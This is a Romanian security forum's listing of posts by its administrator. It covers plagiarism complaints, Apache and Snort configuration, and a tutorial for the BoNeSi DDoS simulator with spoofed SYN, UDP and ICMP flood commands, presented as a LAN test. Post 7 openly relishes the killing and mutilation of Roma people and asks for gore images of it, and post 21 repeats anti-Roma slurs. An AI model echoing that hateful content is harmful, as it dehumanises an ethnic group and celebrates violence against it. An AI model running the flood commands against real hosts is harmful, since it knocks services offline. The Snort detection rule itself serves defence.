Jump to content

aelius

Administrators
  • Posts

    5013
  • Joined

  • Last visited

  • Days Won

    398

Everything posted by aelius

  1. Ma pis pe ei si pe romargul lor. I-am zis de zeci de ori pizdei de Radu Tofan ca tine toti hotii acolo. O sa-i pachetez fiecare ip futut in parte. Sa puna mana pe munca si sa lase laba.
  2. http://forum.satmultimedia.ro/forum/95-linux/18153-util-lg-bonesi.html http://forum.satmultimedia.ro/forum/95-linux/19246-util-lg-detectarea-atacurilor-supernova-cu-snort.html http://forum.satmultimedia.ro/forum/95-linux/19245-util-lg-dezactivare-cpu-pe-linux.html http://forum.satmultimedia.ro/forum/95-linux/19244-util-lg-reboot-a-linux-machine--different-way.html http://forum.satmultimedia.ro/forum/95-linux/19243-util-lg-schimbarea-adresei-mac-sub-platforma-linux.html http://forum.satmultimedia.ro/forum/95-linux/19242-util-lg-crontab-configurare-si-functionare.html http://forum.satmultimedia.ro/forum/95-linux/19241-util-lg-mac-address-lookup-in-bash.html http://forum.satmultimedia.ro/forum/95-linux/19240-util-lg-utilizare-tcpdump.html http://forum.satmultimedia.ro/forum/95-linux/19238-util-lg-monitorizarea-traficului-cu-tcpdump.html http://forum.satmultimedia.ro/forum/95-linux/19236-util-lg-despre-tcpip--clasificarea-adreselor-ip.html http://forum.satmultimedia.ro/forum/95-linux/18686-util-lg-restart-fortat-linux.html http://forum.satmultimedia.ro/forum/95-linux/18157-util-lg-firewall-minimal-pentru-linux.html http://forum.satmultimedia.ro/forum/95-linux/18155-util-lg-protectie-apache-impotriva-slowloris.html http://forum.satmultimedia.ro/forum/95-linux/18154-util-lg-mic-tutorial-hping3--firewall-test.html http://forum.satmultimedia.ro/forum/95-linux/18151-util-lg-minimizarea-efectelor-atacurilor-syn-pe-freebsd.html http://forum.satmultimedia.ro/forum/95-linux/18150-util-lg-minimizarea-efectelor-atacurilor-syn.html Eu le dau forumul jos, lua-le-as neamul la pula. Jumate de forum este copiat.
  3. Salut, Nu, fura astia tot ce prind. https://www.rtfm.ro/ddos/bonesi/ Asta este articolul original, scris de mine. Nu fur tutoriale, am aproape 15 ani de linux in spate. Se poate vedea ca individul ala a postat tot cu hostname "tex" Asta este sistemul atacat in exemplul de mai sus. hp ~ # ifconfig |grep broad inet 10.0.0.8 netmask 0xffffff00 broadcast 10.0.0.255 hp ~ #
  4. Haha, nu, ceva mai profi, daca a folosit cineva ... Sa aiba acolo ce presteaza femeia, galerie de imagini, etc ...
  5. Cand lucrati, aveti intr-o parte deschis QT-ul si in bara xmms-ul cu salam ? Salamul se tine in frigider frate, nu in playlist
  6. Salutari, Am nevoie de un hint pentru un friend. Vrea sa faca un site de escorte si ar fi interesat de un script, de preferinta sa fie in php/mysql. Are cineva vreo idee ? Multumesc
  7. Si mie, in special daca sunt TIGANI ) Am erectie spontana. Daca aveti site-uri cu ciori casapite, batute in cuie, cu capetele taiate, sparti sau arsi de vii, puneti aici ) Astept si poze cu laslo tokes! =)
  8. "Ce ie alea componente ?" Intreaba si tu cate GigaManeli/secunda poate procesa
  9. aelius

    PHP Job

    Scrie detalii. Nu cred ca se chinuie cineva sa dea pm-uri.
  10. Incearca ceva de genul. Eu am testat asa: <form action="http://www.google.de/" method="GET" name="TheFuckingForm"> <input type="submit"> </form> <script type="text/javascript"> var asteapta = 10; function timp(){ if(asteapta >=0) { asteapta=asteapta-1; setTimeout("timp()",1000); } else { asteapta = 0; document.TheFuckingForm.submit(); } } timp(); </script> Inspira-te din functia facuta. (timeout este 10 sec. in exemplul dat) //edit: se pare ca nu functioneaza, face la fel, submit la fiecare Xnr. secunde. Cred ca poti pune pe body onload cumva.
  11. @selected: Nu iti pare rau de curentul consumat de pomana ?
  12. @Yoan11, acum vad semnatura ta. Este site-ul tau ? http://i40.tinypic.com/j6izit.png -> A se observa aceleasi greseli. https://rstcenter.com/forum/9868-windows-cu-reclame.rst http://anysoara.com/windows-cu-reclamele-tale/134/ https://www.rtfm.ro/internet/networking/windows/folosire-windows-ca-router/ https://rstcenter.com/forum/47228-folosire-windows-ca-router.rst http://anysoara.com/folosire-windows-ca-router/124/#comment-30 http://i40.tinypic.com/2qukn6e.png Ioane ... esti dus. Mai si intrebi ca idiotul ce sursa. (Sau ca idioata? Ca are aspect si nume femeiesc pseudo/blog-ul ala) Mult tupeu iti trebuie sa iti faci user la noi si sa ne furi.
  13. Am sters toate posturile de la acest thread. Pune omul un post cu o stire si apar 3 pagini in thread cu injuraturi. Este o stire si atata tot. Daca vrea cineva, o citeste, daca nu, iar la fel. Daca doriti sa comentati, limitati-va la subiectul threadului.
  14. Ventilatorul ala e priponit acolo ... zici ca e prins cu "budihaii" lu mamaie Doamne, nu ma pot opri din ras. Am mutat threadul la 'Cele mai penale' (sub asta, nu avem alta categorie)
  15. )))) e cuibar de gaini bre, sau pc?
  16. aelius

    Intrebare html

    option value= ......... vezi in postul de mai sus.
  17. aelius

    Probleme site

    De la clientul tau de ftp cel mai probabil. Ai luat oarece pe pc si parola de ftp a fost compromisa. Scaneaza cu malwarebytes. Ai aici ceva in legatura cu asta.. Este cam acelasi lucru.
  18. else print 'suck it up'; // Welcome.
  19. @coffee: Ce l-as bate pe "Micul MUC" ala ...
  20. Scurta introducere: Pentru cei care nu stiu inca ce este "Supernova" si cum anume functioneaza: Este o aplicatie ce se foloseste de versiunile vechi de verlihub si da instructiuni participantilor dupa hub sa se conecteze la o aplicatie externa cu scopul de a face un serviciu inaccesibil (ddos). Tintele cele mai preferate sunt site-urile web si stream-urile de radio. Aceasta forma de atac face sa deschida un numar foarte mare de socketi (depinde de cati utilizatori sunt online pe hub-ul de dc++). Cele mai afectate servere web sunt cele non threaded, cum ar fi apache prefork, unde consumul de resurse este de aproximativ 16 MB per process. O regula snort care detecteaza atacurile supernova: alert tcp any any -> any 80 (msg: "Supernova DDoS Attack"; content: "MyNick"; sid: 0000004; ) Daca aveti variabile definite (external_net, home_net): alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: "Supernova DDoS Attack"; content: "MyNick"; sid: 0000004; ) Un scurt fragment din log-urile generate (pentru a vedea cum arata): Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 82.79.181.158:3563 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 82.79.181.158:3563 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 84.232.201.51:4315 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 84.232.201.51:4315 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 79.112.234.88:2155 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 79.112.234.88:2157 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 79.112.234.88:2155 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 79.112.234.88:2157 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 82.79.181.158:3792 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 82.79.181.158:3792 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 109.96.161.105:3894 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 109.96.161.105:3894 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 79.117.24.98:4127 -> 94.177.xxx.xxx:80 Dec 4 19:12:38 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 79.117.24.98:4127 -> 94.177.xxx.xxx:80 Dec 4 19:12:39 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 89.36.11.91:1480 -> 94.177.xxx.xxx:80 Dec 4 19:12:39 idsplus snort[10177]: [1:3:0] Supernova DDoS Attack {TCP} 89.36.11.91:1480 -> 94.177.xxx.xxx:80 Note: - Regula snort este facuta de mine iar string-ul l-am “detectat” cu ettercap. - Nu recomand utilizarea default a snort-ului. Fisierele de configuratie sunt mult prea mari si consuma resurse inutil. Inspectia pachetelor la o rata mare de transfer implica delay-uri si resurse epuizate. Orice ciclu CPU utilizat nu mai poate fi recuperat usor. - Puteti face un fisier separat de configuratie cu cateva reguli (ex: "rules.conf") si sa rulati snort cu "snort -p -c rules.conf -D"
  21. au, futute-n portret, din cauza voastra nu mai functioneaza nici tcp/ip bine. ati infestat internetul cu maneaua si cancerul tiganesc Felicitari pentru categoria aleasa (Cele mai penale posturi)
  22. aelius

    zyma host

    Serverul este la Rapidswitch in Anglia, reteaua este super ok. Are niste reguli prost configurate. Un browser poate deschide si 200 de sesiuni tcp (raman in timewait), asta nu inseamna ca este un atac dos si trebuie blocat. O protectie nu se realizeaza prin blocarea clientilor legiti. De asemenea, KeepAlive este Off (la curl --head apare "Connection: close") - Asta te incurca la servit elemente statice. expose_php este lasat default (on) in php.ini (apare versiunea php in headere: "X-Powered-By: PHP/5.3.8") Server configurat de amator.
  23. Daca aveti un domeniu pe care faceti multe subdomenii pentru development sau mai multe domenii pe doriti sa le mapati ca hosturi virtuale fara sa fie necesar sa dati reload la apache sau sa fiti nevoiti sa adaugati vhost-ul in fisierul de configurare, atunci tutorialul acesta va este de folos. Sa prespupunem ca aveti un domeniu, de exemplu, "rstcenter.com" iar in home user aveti un director www. Structura directoare: /home /home/tex /home/tex/www /home/tex/www/devel1.rstcenter.com /home/tex/www/devel2.rstcenter.com /home/tex/www/devel3.rstcenter.com /home/tex/www/books.rstcenter.com /home/tex/www/tools.rstcenter.com ............. Aveti de facut un singur virtual host in apache, apoi orice director creat dupa structura de mai sus, va putea fi utilizat ca virtual host, fara sa fiti nevoiti sa dati restart/reload sau sa adaugati ceva in apache. Virtual host: <VirtualHost> DocumentRoot /home/tex/www ServerAdmin webmaster@stfu.ro ServerName rstcenter.com ServerAlias *.rstcenter.com CustomLog logs/access_log combined ErrorLog logs/error_log RewriteEngine On RewriteMap lowercase int:tolower RewriteRule ^/(.*)$ /home/tex/www/${lowercase:%{SERVER_NAME}}/$1 </VirtualHost> Imi era lene sa tot adaug vhost-uri si sa dau reload pentru un amic cu un buncar de subdomenii utilizate la development. Cu asta, imi pot bea linistit cafelele
  24. Ce este BoNeSi ? BoNeSi este un tool pentru simularea atacurilor DDoS (distributed denial of service) pentru a studia efectele unui atac DDoS cat si posibilitatea de filtrare (sau minimizare a efectelor) unui astfel de atac. Am testat acest tool pe un server local cu Debian utilizand ca SRC IP 10.0.0.7 iar ca DST IP 10.0.0.8 pe care am un server ce ruleaza FreeBSD. La primul test, cel cu protocol tcp, capacitatea atacului a fost de 5096.83 flows/s. Curios este faptul ca desi rata la inbound era de doar 10,16 Mbps, serverul web ce rula pe DST era inaccesibil. La al II-lea test, cel cu protocol udp, capacitatea atacului a fost de 16602.50 flows/s. iar rata la inbound de 3,3 Mbps, iar la al III-lea test, cel cu icmp echo request, capacitatea atacului a fost de 7248.00 flows/s. Cele doua servere folosite la acest test, sunt conectate in LAN printr-un switch Allied Telesis iar link-ul este de 100mbps. In toate testele (tcp, icmp, udp) sursele de atac sunt alterate (spoofed) cu adresele ip din fisierul “50k-bots” Mentionez ca pe sistemul atacat era instalat apache2, prefork (default) si nu erau modificari la ListenBacklog. Instalare pe debian: tex work # apt-get install libnet1-dev libpcap-dev tex work # wget http://bonesi.googlecode.com/files/bonesi-0.1.1.tar.gz tex work # tar zxvf bonesi-0.1.1.tar.gz tex work # cd bonesi-0.1.1 tex bonesi-0.1.1 # ./configure && make tex bonesi-0.1.1 # cp src/bonesi . Utilizare: Test I: Pentru syn spoofed (tcp attack): ./bonesi --ips=50k-bots --protocol=tcp -d eth0 10.0.0.8:80 Test II: Pentru udp spoofed: ./bonesi --ips=50k-bots --protocol=udp -d eth0 10.0.0.8:80 Test III: Pentru icmp spoofed (echo request): ./bonesi --ips=50k-bots --protocol=icmp -d eth0 10.0.0.8:80 Vizualizare pachete cu tcpdump la primul test (5 linii): 02:21:23.681982 IP 88.126.89.159.22458 > 10.0.0.8.80: Flags [S], seq 1237269533, win 4096, options [mss 1402,nop,wscale 0,nop,nop,TS val 1365282408 ecr 0,sackOK,eol], length 0 02:21:23.682074 IP 122.105.124.102.24571 > 10.0.0.8.80: Flags [S], seq 829903001, win 4096, options [mss 1460,nop,sackOK,eol], length 0 02:21:23.682115 IP 240.179.162.42.14539 > 10.0.0.8.80: Flags [S], seq 333938234, win 4096, options [mss 1516,nop,sackOK,eol], length 0 02:21:23.682154 IP 251.224.133.235.14748 > 10.0.0.8.80: Flags [S], seq 1230917056, win 4096, options [mss 1516,nop,sackOK,eol], length 0 02:21:23.682195 IP 48.44.25.215.26626 > 10.0.0.8.80: Flags [S], seq 802302864, win 4096, options [mss 1430,sackOK,TS val 1840537518 ecr 0,nop,wscale 0], length 0 Vizualizare pachete cu tcpdump la al II-lea test (5 linii): 02:28:40.917828 IP 141.162.25.189.34536 > 10.0.0.8.80: UDP, length 32 02:28:40.918783 IP 155.243.83.223.18623 > 10.0.0.8.80: UDP, length 32 02:28:40.918791 IP 255.46.11.142.29747 > 10.0.0.8.80: UDP, length 32 02:28:40.918797 IP 145.217.172.116.33624 > 10.0.0.8.80: UDP, length 32 02:28:40.918804 IP 246.242.203.210.10015 > 10.0.0.8.80: UDP, length 32 Vizualizare pachete cu tcpdump la al III-lea test (5 linii): 02:35:49.156760 IP 11.132.139.168 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.156770 IP 35.68.7.119 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157715 IP 136.87.254.149 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157722 IP 12.23.245.154 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 02:35:49.157727 IP 91.33.156.53 > 10.0.0.8: ICMP echo request, id 66, seq 66, length 40 Note: - Din cate puteti observa, testele sunt facute in LAN. Atacurile DoS/DDoS sunt ilegale. Va sfatuiesc sa nu faceti teste catre retele care nu va apartin (sau cel putin, nu dupa ip-urile voastre) - Am specificat la inceput la ce anume poate fi de folos (tot din acest motiv, am facut captura la pachete)
  25. offtopic: Ati inebunit pe pr0n bre? Sunt femei destule, ce va place sa le vedeti pe sticla?
×
×
  • Create New...